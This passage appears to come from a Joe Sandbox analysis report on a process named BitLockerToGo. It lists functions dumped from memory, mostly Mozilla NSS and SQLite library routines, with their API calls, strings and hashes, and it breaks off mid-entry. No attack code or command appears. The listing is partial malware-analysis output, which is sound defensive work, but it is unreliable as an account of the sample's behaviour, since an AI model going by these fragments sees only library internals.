                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                                                                                                                                                                    • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                                                                                    • API String ID: 2948422844-1374795319
                                                                                                                                                                                                                                                                                                                    • Opcode ID: fe397c8265e30a4469baafcf9fae4670aac68fa53fc9398eb3936892bd7df468
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5e2c38b9b99fcc8d319b9dcbf6573a12f9667f1fe011525f81594e0766778d72
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe397c8265e30a4469baafcf9fae4670aac68fa53fc9398eb3936892bd7df468
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B01D2B6900254BBDF01AFA4EC45CAB3F3DEF4A7A4F014024FD0A97711D676E96087A2
                                                                                                                                                                                                                                                                                                                    Function 6C9B9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: EnterCriticalSection.KERNEL32(6C9FE370,?,?,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284), ref: 6C9AAB94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9AAB89: LeaveCriticalSection.KERNEL32(6C9FE370,?,6C9734DE,6C9FF6CC,?,?,?,?,?,?,?,6C973284,?,?,6C9956F6), ref: 6C9AABD1
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C984A68), ref: 6C9B945E
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9B9470
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9B9482
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C9B949F
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C9B9459
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9B947D
                                                                                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9B946B
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                                                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                                                                                                                    • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f14b6da31e205c3ebe89ad1a81d014e2009a16a2e47a1356d2c248339f59398b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9d0a081e31596349fdbe0079f5c250a646fe893356672b9f9d0925ef53331590
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f14b6da31e205c3ebe89ad1a81d014e2009a16a2e47a1356d2c248339f59398b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91014C70A041009BDF109B5CEC48A4633FA9B5632CF154537DC6AD6B51D731D45ACA9B
                                                                                                                                                                                                                                                                                                                    Function 6CB64D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB64DC3
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB64DE0
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • misuse, xrefs: 6CB64DD5
                                                                                                                                                                                                                                                                                                                    • %s at line %d of [%.10s], xrefs: 6CB64DDA
                                                                                                                                                                                                                                                                                                                    • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB64DCB
                                                                                                                                                                                                                                                                                                                    • invalid, xrefs: 6CB64DB8
                                                                                                                                                                                                                                                                                                                    • API call with %s database connection pointer, xrefs: 6CB64DBD
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                                                                    • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c1797e4154285c04c24db9288b04c85e2158e8619e8147000b9a9818d54af218
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0a2a62aaf0670fd65ed8a54086544df78be51e0d2a6e72249050b007700106bd
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1797e4154285c04c24db9288b04c85e2158e8619e8147000b9a9818d54af218
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63F0B419F14DF96BD6008126DE31F8637598F01369F5609A1EE047BE62D606AC9886C3
                                                                                                                                                                                                                                                                                                                    Function 6CB64DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB64E30
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB64E4D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • misuse, xrefs: 6CB64E42
                                                                                                                                                                                                                                                                                                                    • %s at line %d of [%.10s], xrefs: 6CB64E47
                                                                                                                                                                                                                                                                                                                    • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB64E38
                                                                                                                                                                                                                                                                                                                    • invalid, xrefs: 6CB64E25
                                                                                                                                                                                                                                                                                                                    • API call with %s database connection pointer, xrefs: 6CB64E2A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                                                                    • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 28787f1ce3a0c8afc38f54aeb8ef05c0a9acf7d01176ddad56e6fdbf7b9798e4
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f42d32b3d6d885efa2d07d8d946620855c4eb1b40715b25f558a5db408837ef4
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28787f1ce3a0c8afc38f54aeb8ef05c0a9acf7d01176ddad56e6fdbf7b9798e4
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F02719F44DE82BEA148026DD31FC73789CB03379F5985A1EA0877F92D309986146D3
                                                                                                                                                                                                                                                                                                                    Function 6CAD0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000,6CAD1444,?,00000001,?,00000000,00000000,?,?,6CAD1444,?,?,00000000,?,?), ref: 6CAD0CB3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CAD1444,?,00000001,?,00000000,00000000,?,?,6CAD1444,?), ref: 6CAD0DC1
                                                                                                                                                                                                                                                                                                                    • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CAD1444,?,00000001,?,00000000,00000000,?,?,6CAD1444,?), ref: 6CAD0DEC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CA92AF5,?,?,?,?,?,6CA90A1B,00000000), ref: 6CAF0F1A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0F10: malloc.MOZGLUE(00000001), ref: 6CAF0F30
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CAF0F42
                                                                                                                                                                                                                                                                                                                    • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CAD1444,?,00000001,?,00000000,00000000,?), ref: 6CAD0DFF
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CAD1444,?,00000001,?,00000000), ref: 6CAD0E16
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CAD1444,?,00000001,?,00000000,00000000,?), ref: 6CAD0E53
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3(?,?,?,?,6CAD1444,?,00000001,?,00000000,00000000,?,?,6CAD1444,?,?,00000000), ref: 6CAD0E65
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CAD1444,?,00000001,?,00000000,00000000,?), ref: 6CAD0E79
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE1560: TlsGetValue.KERNEL32(00000000,?,6CAB0844,?), ref: 6CAE157A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE1560: EnterCriticalSection.KERNEL32(?,?,?,6CAB0844,?), ref: 6CAE158F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE1560: PR_Unlock.NSS3(?,?,?,?,6CAB0844,?), ref: 6CAE15B2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAAB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CAB1397,00000000,?,6CAACF93,5B5F5EC0,00000000,?,6CAB1397,?), ref: 6CAAB1CB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAAB1A0: free.MOZGLUE(5B5F5EC0,?,6CAACF93,5B5F5EC0,00000000,?,6CAB1397,?), ref: 6CAAB1D2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CAA88AE,-00000008), ref: 6CAA8A04
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA89E0: EnterCriticalSection.KERNEL32(?), ref: 6CAA8A15
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA89E0: memset.VCRUNTIME140(6CAA88AE,00000000,00000132), ref: 6CAA8A27
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAA89E0: PR_Unlock.NSS3(?), ref: 6CAA8A35
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1601681851-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b1f5fa664e7110db5a581be720cfad8cd354818790847977b16871ef514823ea
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 92fcc65920fea06603fa6e8529390556ab6dcefaeeee9e7f15494e84ba0a53be
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1f5fa664e7110db5a581be720cfad8cd354818790847977b16871ef514823ea
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D51E6B5D002515FEB009F64DD81ABF37B8EF49218F190425ED19A7702FB31FD9986A2
                                                                                                                                                                                                                                                                                                                    Function 6CA82D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: __allrem
                                                                                                                                                                                                                                                                                                                    • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                                                                                                                                                                                                                    • API String ID: 2933888876-3221253098
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3b385300507b5bb9b987adfb16c34b6c731b609b32605be97e9827dc72024e8c
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 85e4661ee3128e567aa94ce918e6e4b3c4744f6c79da60748a7bf8bfe53b7a12
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b385300507b5bb9b987adfb16c34b6c731b609b32605be97e9827dc72024e8c
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1761CD75B012049FDB44CF68DC94AAE7BB1FF49364F148228E9199BB80DB31AC46CB95
                                                                                                                                                                                                                                                                                                                    Function 6CADAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CADAB3E,?,?,?), ref: 6CADAC35
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CABCF16
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CADAB3E,?,?,?), ref: 6CADAC55
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
                                                                                                                                                                                                                                                                                                                    • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CADAB3E,?,?), ref: 6CADAC70
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: TlsGetValue.KERNEL32 ref: 6CABE33C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: EnterCriticalSection.KERNEL32(?), ref: 6CABE350
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: PR_Unlock.NSS3(?), ref: 6CABE5BC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CABE5CA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: TlsGetValue.KERNEL32 ref: 6CABE5F2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: EnterCriticalSection.KERNEL32(?), ref: 6CABE606
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABE300: PORT_Alloc_Util.NSS3(?), ref: 6CABE613
                                                                                                                                                                                                                                                                                                                    • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CADAC92
                                                                                                                                                                                                                                                                                                                    • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CADAB3E), ref: 6CADACD7
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(?), ref: 6CADAD10
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CADAD2B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABF360: TlsGetValue.KERNEL32(00000000,?,6CADA904,?), ref: 6CABF38B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABF360: EnterCriticalSection.KERNEL32(?,?,?,6CADA904,?), ref: 6CABF3A0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CABF360: PR_Unlock.NSS3(?,?,?,?,6CADA904,?), ref: 6CABF3D3
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2926855110-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8c9c90c66808e55904f09157196f3c14cf11a435e3404b495098e9658773b6ad
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f35e64576498af9474e7da154f306291c714eaa4d8667b6e2d50cbd5c184a0c0
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c9c90c66808e55904f09157196f3c14cf11a435e3404b495098e9658773b6ad
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF312BB5E006055FEB008F69DC409AF777BEF84728B1D8128E81557740EB31ED9587A1
                                                                                                                                                                                                                                                                                                                    Function 6CAB8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_Now.NSS3 ref: 6CAB8C7C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBA0A27), ref: 6CB59DC6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBA0A27), ref: 6CB59DD1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB59DED
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAB8CB0
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAB8CD1
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAB8CE5
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAB8D2E
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CAB8D62
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAB8D93
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3131193014-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d3d6b1fea2dd6dc25ef0b76bf0969ebfa7ffdffbdf610de3da17986c2ba611f9
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 333fd75123a7f5e4fd05b50d7e7cd15e2461e08fd9abae18f53679a044a7baac
